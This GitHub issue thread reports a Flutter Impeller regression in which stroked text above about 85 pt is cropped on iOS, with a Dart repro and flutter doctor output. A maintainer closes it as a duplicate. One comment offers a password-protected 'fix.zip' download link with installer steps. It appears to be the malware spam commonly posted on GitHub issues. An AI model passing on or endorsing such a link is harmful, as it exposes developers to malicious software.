### ISSUE TITLE
[Impeller] Text border color is cropped when font size is too big

### ISSUE THREAD

**Issue by tguerin** [flutter/flutter#154099] opened 2024-08-26 09:00 UTC
### Steps to reproduce

1. Use a font size that is over 85 with a foreground painter on iOS

This is a regression from 3.24.0, no issue on 3.22.3. Skia engine is working fine.

### Expected results

Text should not be cropped:

<img height="500" src="https://github.com/user-attachments/assets/1945afc3-6e0a-4096-b2fb-be52865ae850"/>

### Actual results

Text is cropped:

<img height="500" src="https://github.com/user-attachments/assets/14ddbd48-de69-467a-a88c-5b1bdb9adaf1"/>

No issue on 3.22.3:

<img height="500" src="https://github.com/user-attachments/assets/afa529a7-cdb9-4d90-b230-dbe8966d6740"/>

### Code sample

<details open><summary>Stroke Text</summary>

```dart
import 'package:flutter/material.dart';

void main() {
  runApp(const MyApp());
}

class MyApp extends StatelessWidget {
  const MyApp({super.key});

  @override
  Widget build(BuildContext context) {
    const textStyle = TextStyle(
      color: Color(0xFF000000),
      fontSize: 86,
    );
    var text = 'Test';
    return Directionality(
      textDirection: TextDirection.ltr,
      child: Center(
          child: Stack(
        clipBehavior: Clip.none,
        children: [
          Text(
            text,
            style: TextStyle(
              foreground: Paint()
                ..style = PaintingStyle.stroke
                ..strokeWidth = 20
                ..color = Color(0xFFFFFFFF),
            ).merge(
              textStyle,
            ),
          ),
          Text(
            text,
            style: textStyle,
          ),
        ],
      )),
    );
  }
}
```

</details>

### Screenshots or Video

<details open>
<summary>Screenshots / Video demonstration</summary>

[Upload media here]

</details>

### Logs

<details open><summary>Logs</summary>

```console
[Paste your logs here]
```

</details>

### Flutter Doctor output

<details open><summary>Doctor output</summary>

```console
Doctor summary (to see all details, run flutter doctor -v):
[✓] Flutter (Channel stable, 3.24.1, on macOS 14.0 23A344 darwin-arm64, locale en-FR)
[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
[✓] Xcode - develop for iOS and macOS (Xcode 15.4)
[✓] Chrome - develop for the web
[✓] Android Studio (version 2024.1)
[✓] IntelliJ IDEA Ultimate Edition (version 2024.2.0.2)
[✓] Connected device (5 available)
[✓] Network resources

• No issues found!
```

</details>

**Comment by Wanderx13** [comment] 2024-08-26 09:00
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jonahwilliams** [comment] 2024-08-26 18:38
Duplicate of https://github.com/flutter/flutter/issues/153784

**Closed by jonahwilliams** 2024-08-26 18:38 UTC
